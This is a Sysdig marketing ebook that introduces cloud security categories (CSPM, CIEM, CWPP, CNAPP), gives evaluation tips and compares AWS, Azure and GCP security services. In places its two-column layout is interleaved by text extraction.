Cloud Security 101

A Primer on CSPM, CIEM,

CWPP and CNAPP
Contents
Cloud Security in View of Today’s Realities . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3

Shared Responsibility Model for the Cloud . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3

Cloud Provider Security Tools Are Not Enough . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4

Key Cloud Security Solution Categories: CSPM, CIEM, and CWPP . . . . . . . . . . . . . . . . . . . . . 5

What is CSPM? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5

What is CIEM? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7

What is CWPP? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8

CNAPP: Not Just Another Acronym . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8

What is CNAPP? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9
CNAPP Has You Covered . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10

Five key considerations when evaluating a cloud security solution . . . . . . . . . . . . . . . . . . . . 11

#1 Choose an agentless + agent based approach for comprehensive protection . . . . . . 11
#2 Manage configuration and permission risk . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11
#3 Enable Cloud Security Monitoring with Audit Logs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12
#4 Implement runtime detection and response . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
#5 Map to the MITRE ATT&CK framework . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13

Unified Container and Cloud Security with Sysdig . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13

Appendix . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14
Cloud Security in View Shared Responsibility
of Today’s Realities Model for the Cloud
Life was simpler when IT environments were restricted to on-prem- The first step in planning for cloud security is understanding the
ises data centers, self-contained fortresses with one way in and one shared responsibility model. All major public clouds, (e.g., AWS, Azure,
way out. But these days, with more and more organizations moving GCP) use a shared security concept to distinguish between secu-
business-critical applications and data to the cloud — and cyber- rity risks that the cloud provider manages and those that it expects
criminals already hard at work there — detecting threats is less like customers to address.
defending an ancient fortress and more like securing Disneyland. Like
an amusement park, distributed infrastructure based on cloud tech- Under this model, cloud providers are responsible for managing aspects
nologies consists of many attractions, multiple types of consumers, of security on their end, such as securing physical servers that host
countless interactions, and varying entrances and exits. But there’s VM instances and storage buckets. They also perform regular audits
nothing fun about it for SecDevOps, DevOps, and cloud security of their systems. However, the burden of securing resources that end
operations teams. In fact, with so many temptations for bad actors users deploy in the cloud lies mostly with the end users themselves. At a
and so much at stake, it’s an environment that demands highly intelli- minimum, cloud providers expect that the data you upload is protected
gent security technologies and constant vigilance. by access controls as mandated by your compliance frameworks, and
that you make sure to secure the OS running on a cloud VM instance.
Organizational teams already have their hands full meeting customer
demand and delivering on business objectives. The spectrum of
threat actors exists nonetheless, and any organization's systems will
inevitably be targeted irrespective of company size or vertical.

The only sure thing is that, one day, an insecure configuration lurking
deep within a cloud stack will wreak havoc, or a new type of threat
will emerge to exploit a new vulnerability. It’s inevitable. So, is cloud
security possible or is it pie in the sky?

Cloud Security 101 3

Cloud Provider Security
Tools Are Not Enough
The purpose of this document is not to highlight the security gaps of
cloud service providers or their tools, which are both adding tremen-
dous value in enterprise environments. Rather, it’s to make the reader
aware that security is an add-on for cloud providers, a secondary
priority. Their main focus is to provide cloud computing, network, and
storage services – not security.

Imagine you are just starting on your cloud adoption journey, and
you only have a couple of IaaS or SaaS services running. You can
easily implement security policies with tools provided from public
cloud providers that will alert your team to suspicious behavior:
AWS Security Hub, AWS GuardDuty, Azure Security Center, Azure
Defender, or Google Security Command Center are some good
examples. But as the number of services you consume from cloud
providers increases, the need to beef up security becomes more
apparent (and urgent), and there is a good chance you end up realizing
that these tools are not enough to secure your cloud environment.
See the appendix below for a detailed comparison.

One more caveat: CSPs’ security tools are a big source of vendor lock-
in, as they compel you to stay with that provider because you are
customizing your security controls with their tools. As you move into
multi-cloud territory, you will need a solution that talks to all clouds
and fills in the gaps that cloud providers can’t or won’t cover.

Cloud Security 101 4

Key Cloud Security Solution the configurations of the cloud tenant. These tools enhance cloud
security by identifying insecure configurations, which enables organi-
Categories: CSPM, CIEM, and CWPP zations to address gaps and design a more secure architecture. Some
Are your teams up to speed about security in the cloud? If not, you CSPM solutions also offer remediation and other extended capabili-
aren’t alone. According to Gartner®, “50% of the participating organi- ties, though most organizations use CSPMs for compliance purposes
zations indicated that there is a lack of internal knowledge about secu- and auditing only.
rity in cloud-native DevSecOps.” [1] And this is happening as new terms,
categories, and technologies are surfacing daily. But regardless of how
many new buzzwords come along, there are three well-established
cloud security categories to be aware of: CSPM, CIEM, and CWPP.

What is CSPM?
CSPM is a set of controls that detect when your deployed accounts
and resources deviate from security best practices. The different stan-
dards that are part of the CSPM controls allow you to continuously “Through 2025, more than 99% of cloud
evaluate all of your cloud accounts and workloads to quickly iden- breaches will have a root cause of preventable
tify areas of cloud drift and platform misconfigurations. It provides
actionable and prescriptive guidance on how to improve and maintain
misconfigurations or mistakes by end users.” [2]
your organization’s security posture.

Cloud Security Posture Management (CSPM) tools unify the security

use cases of protecting the cloud control plane (by enabling moni-
toring for misconfigurations), tracking cloud resources, and verifying

[1] Gartner, “Emerging Technologies: Future of Cloud-Native Security Operations,” Mark Wah, Charlie Winckless, 17 November 2021.
[2] Gartner, “Hype Cycle™ for Cloud Security, 2021,” Tom Croll, Jay Heiser, 27 July 2021

* GARTNER® and HYPE CYCLE™ are registered trademarks and service marks of Gartner, Inc. and/or its affiliates in the U.S. and internationally and is used herein
with permission. All rights reserved.

Cloud Security 101 5

CSPM tools ensure that cloud settings align with best practices. This enables cloud teams to map out-of-the-box frameworks controls and bench-
marks and save time when addressing things like:
• Data storage exposed directly to the internet
• Lack of encryption on databases
• Lack of multi-factor authentication enabled on critical system accounts

By notifying teams when violations occur, CSPM tools enable teams to take action and prioritize remediation.

Figure 1. Sysdig’s Insights dashboard shows a single view of risk across clouds and workloads.

Cloud Security 101 6

What is CIEM? which human and non-human identities can access which resources,
but which permissions they are using on a daily basis. Armed with this
Granting excessive permissions and entitlements to cloud resources is knowledge, you can modify policy to enforce least-privilege access.
one of the most common misconfiguration problems. With the explo-
sion of cloud identities, both human and non-human, implementing Let’s say we have a group of users who are part of a project. These users
the least-privilege principle becomes very complex in a dynamic cloud are responsible for uploading images into a repository and running
environment. In addition, as cloud providers keep adding services and those containers in cloud instances, as well as for a number of auto-
features, it becomes increasingly difficult to know exactly what those scaling actions. There’s no need for them to have all the permissions
least-privilege settings are. an administrator has, even though that approach may be the simplest
to configure. Are they going to be deleting VPCs? That is not one of
Cloud Infrastructure Entitlement Management (CIEM) tools address their tasks. Using CIEM tools to get rid of excessive permissions is an
this issue by detecting over-permissioned accounts and roles, unused important step in reducing collateral damage from credential theft.
permissions, and unused accounts. With CIEM, you not only know

Figure 2. A CIEM dashboard should suggest policies to enforce the least privilege.

Cloud Security 101 7

What is CWPP? CNAPP: Not Just Another Acronym
Cloud Workload Protection Platform (CWPP) tools protect workloads. As the cloud-native application space evolves, more moving parts
Specifically, they focus on securing the whole application lifecycle, are inevitably introduced. Thankfully, the industry is using a modular
providing cloud-based security solutions that protect instances on approach with cloud-native technologies. As such, existing CI/CD
AWS, Google Cloud Platform (GCP), Microsoft Azure, and other cloud pipelines and runtime platforms can be extended and updated as
vendors’ platforms. CWPP solutions are built for specific use cases: better methods are discovered.

• ​​ untime detection: Detect suspicious behavior of applications

R The downside of all this modularity is complexity. It can be daunting
at runtime. Automate response for threats. to figure out what to introduce in the application lifecycle in order
• System hardening: Prevent security risk by eliminating potential to get a reasonable level of security policy and enforcement in place.
attack vectors and condensing the system’s attack surface. And that’s where a Cloud Native Application Protection Platform
(CNAPP) comes into play. Leveraging a CNAPP gives you in-depth,
• Vulnerability management: Detect OS and non-OS
multi-layered, agent-based, and agentless coverage across all
vulnerabilities of known exploitations and ensure it stays
aspects of your environment — everything from proactive validation
compliant with any regulatory requirements.
of workloads to auditing policies on the public cloud platform you’re
• Network security: Visualize network traffic inside containers running on.
and Kubernetes, and enforce Kubernetes-native network
segmentation.
• Compliance: Ensure production workloads comply with
regulatory standards.
• Incident Response: Respond to security incidents using valuable
evidence from forensics to help you contain the breach.

Cloud Security 101 8

What is CNAPP?
CNAPP is the umbrella security category that covers the use cases
that would otherwise fall into the CSPM and CWPP categories.
According to Gartner,

“Cloud-native application protection platform (CNAPP) provides more

than CWPP-CSPM convergence: There are two important drivers
for CNAPP. Firstly, CWPP vendors are looking to posture to provide
workload context. Secondly, CSPMs are challenged to provide more
and more visibility while “drilling down” into the workload. CNAPP
integrates CSPM and CWPP to offer both, and potentially augments
them with additional cloud security capabilities.” [3]

One side benefit of a CNAPP is that it allows customers and vendors to

readily see the value that cloud security suites can deliver, as opposed
to a series of point solutions that need to be painstakingly integrated.

A CNAPP encapsulates five core capabilities from development to

production and back to development. These are:
• Development artifact scanning
• Cloud Security Posture Management (CSPM) Figure 3. The relationship between key cloud security solution product
• Infrastructure as Code (IaC) scanning categories.

• Cloud infrastructure entitlement management

• Runtime cloud workload protection platform

A CNAPP provides a feedback loop that enables true end-to-end

coverage of a cloud-native application lifecycle.

[3] Gartner, Inc., How to Protect Your Clouds with CSPM, CWPP, CNAPP, and CASB, 2021, Richard Bartley, 6 May 2021

Cloud Security 101 9

CNAPP Has You Covered
Implementing a CNAPP can give you dramatically better visibility and
control of the entire cloud-native application stack. The alternative
is a hodgepodge of point solutions that require inordinate amounts
of time and effort trying to consolidate and correlate data across the
organization’s entire technology landscape, still not knowing conclu-
sively that all areas are covered.

With a CNAPP, comprehensive coverage is a given. In addition, a true

CNAPP solution can reveal interrelationships between the insights
of various use cases and promote collaboration between SecDevOps,
DevOps, and cloud security operations teams. It can be the equalizer
when it comes to providing real-time knowledge of the cloud envi-
ronment and incorporating common workflows, data correlations,
meaningful insights, and remediation.

By implementing a CNAPP, you can achieve a higher level of security

across all major aspects of your cloud-native application stack. And by
embedding CNAPP security from the earliest stages of the develop-
ment process all the way into production, you can ensure that what
is delivered will maintain the highest levels of security and integrity.

Cloud Security 101 10

Five key considerations when Despite their drawbacks, software agents are likely to play key roles
in the cloud for years to come. While agentless security methods
evaluating a cloud security solution can easily access uniform, API-based cloud control planes to identify
Security tools provided by CSPs offer a wide array of functionalities. many types of problems, and they enable quick and easy onboarding,
They can be plentiful, nevertheless, most of these tools are geared they should be part of a multi-layered defensive strategy that contains
toward their own cloud environments. To get everything integrated, both agent-based and agentless technologies. Otherwise, there will
especially if you’re working with hybrid and multi-cloud architectures be gaps in visibility and solution coverage.
as many organizations do, requires a lot of work on the part of cloud
engineers and security engineers. At times like this, you'd want to Agentless approaches are effective for inventorying the cloud services
consider a third-party solution, a CWPP or CNAPP tool rather than your team is using and identifying known vulnerabilities in software.
native CSP tooling. They can also allow your teams to detect threats based on logs. As for
agent-based approaches, they deliver real-time detection of runtime
Below are five key points to consider when evaluating a third-party threats, malware, and advanced persistent threats. Once you detect
solution: a threat, the detailed activity record and context an agent provides is
critical for incident response, containment, and forensic investigation.
To effectively manage security risk requires using both approaches.
#1 Choose an agentless + agent based
approach for comprehensive protection
#2 Manage configuration and permission risk
When evaluating security tools designed for the cloud — and
Ensure you have full visibility into cloud assets, identifying miscon-
depending on the service you consume from the cloud provider (IaaS,
figurations and drift across multi-cloud environments. Implement the
CaaS, PaaS, FaaS, etc.) — you will come across agentless, agent-based,
least-privilege principle by detecting and removing excessive permis-
and approaches that combine both. Agentless deployments are easier,
sions on user roles, human and non-human. Look for tools that can
require minimal management overhead, impose little to no perfor-
not only automatically discover all identity and access management
mance overhead, and can accommodate systems that can’t handle
roles and their permission configurations, but also can detect roles
agents. Agent-based approaches provide much deeper visibility that
with excess permissions and recommend the right permission settings.
facilitates more comprehensive context and real-time detection,
enabling faster incident response, containment, and investigation.
But agents are more difficult and time-consuming to manage.

Cloud Security 101 11

#3 Enable Cloud Security
Monitoring with Audit Logs
Cloud security monitoring is the first crucial step toward keeping
track of potential security threats within a sprawling, multi-layered
cloud environment. Audit logs systematically record actions within a Falco Takes Auditing Further
cloud environment as the actions take place. They tell you who did
what, when it happened, and what changed. If someone creates a Stream detection is a continuous process that collects,
user, changes permissions, or spins a new instance, it will be traced in analyzes, and reports on data in motion. Based on that
those logs. idea, the open source community offers a solution: Falco.

All of the major public cloud providers offer native services to Connecting Falco to cloud audit logs allows you to
enable audit logging and help you track the logs. Examples are AWS identify unexpected changes to permissions and
CloudTrail, Cloud Audit Logs in GCP, and Azure audit logs. Almost services access rights, as well as unusual activity
anything happening in a cloud environment is tracked and logged in that can indicate the presence of an intruder or data
cloud audit logs. By analyzing these audit logs, you can detect unex- exfiltration. It doesn’t require you to ship logs into an
pected behavior, configuration changes, intrusions, and data theft. external repository for threat detection, so you don’t
However, these services typically work only with individual cloud incur reduced bandwidth and higher storage costs.
accounts and individual clouds. If you’re like 93 percent of organiza-
tions today that use multiple clouds at the same time, a third-party
tool is necessary. Third-party tools aggregate cloud audit logs from
across various cloud environments so you can analyze them centrally
and detect suspicious patterns within audit data from any public
cloud environment.

Cloud Security 101 12

#4 Implement runtime detection and response Unified Container and Cloud
Act fast on early indicators of compromise. Runtime threats are real
and growing in sophistication. Adversaries are launching complex
Security with Sysdig
attacks to evade detection while infecting systems for maximum gain. Sysdig is driving the standard for securing the cloud, empowering
Don’t miss real-time signals. Get deep visibility into events to detect organizations to confidently protect containers, Kubernetes, and
suspicious behavior and malicious activity in the cloud, container, and cloud services. The Sysdig platform enables teams to secure the build,
Kubernetes. Make sure you have the ability to collect detailed foren- detect and respond to runtime threats, and continuously manage
sics evidence in case an incident occurs and the container is gone. cloud configurations, permissions, and compliance. It’s the ideal solu-
tion for end-to-end cloud infrastructure security.

#5 Map to the MITRE ATT&CK framework Experience the visibility and security value first hand in your own
All major cloud service providers offer native security tools to harden cloud and container environment.
their compute services and environments; however, each of these
services is slightly different from the other. Therefore, a common Watch How to Get Started
language is needed when talking about cloud security. Adopting a
unified security framework will make it easier for security engineers
with Sysdig Secure.
to manage cloud breaches and provide a foundation for threat models
and methodologies.
Start a free, 30-day trial.
The MITRE ATT&CK framework is a comprehensive knowledge base
that categorizes the major threats in a way that helps cybersecurity
teams fortify their infrastructure. It provides analysis of all the tactics,
techniques, and procedures (TTPs) that advanced threat actors use in
their attacks. The MITRE ATT&CK framework serves as a foundation
for threat models and methodologies. It can also give you a head start
on any compliance standard, since it guides your cybersecurity and
risk teams to follow established best practices.

MITRE ATT&CK for cloud maps the specific TTPs that advanced threat
actors could possibly use in their attacks on cloud environments.

Cloud Security 101 13

Appendix
Comparison table of security capabilities in the three major public cloud providers:

Service AWS Azure GCP

DevOps Lifecycle

AWS CodeBuild, AWS Azure DevOps, Github

CI/CD Cloud Build
CodeDeploy, AWS CodePipeline Enterprise

Provisioning templates CloudFormation Azure Resource Manager Cloud Deployment Manager

Azure Custom Images, Azure API

Service Catalog AWS Service Catalog Private Catalog
Management

Security Center – Resource Cloud Security Command

Security Assessment Inspector
Security Hygiene Center

Serverless Code Lambda Azure Functions Cloud Functions

Insights Systems Manager Monitor Stackdriver Monitoring

Detection

DLP Macie Azure Information Protection Cloud DLP

Anomaly Detection GuardDuty Stream Analytics Cloud Dataflow

Vulnerability Scan Inspector Security Center Scanner

Cloud Security 101 14

Service AWS Azure GCP

Protection

DDOS Shield DDOS Protection Preset

MFA Multi-Factor Auth Azure MFA Cloud Identity Aware Proxy

Web App FW WAF Azure WAF, Application Gateway Cloud Armor

AWS Identity & Access Cloud Identity and Access

IAM Azure AD/IAM
Management Cognito Management

Key Management KMS Azure Key Vault Cloud KMS

Audit

Log Management CloudTrail Azure Audit Logs Cloud Audit Logs

Config Management Config Azure Security Control Cloud Asset Inventory

Compliance CloudHSM Azure Trust Center and Key Vault GCP Security

Service Catalog Service Catalog Managed Applications Service Catalog

Security Monitoring

CloudWatch and Amazon Azure Sentinel and Azure Stackdriver Monitoring/

SIEM
GuardDuty Monitor Logging, Chronicle

Cloud cost optimization Trusted Advisor Azure Advisor Recommender

Cloud Security 101 15

 www.sysdig.com
Copyright © 2022 Sysdig, Inc. All rights reserved. eBK-004 Rev. A 4/22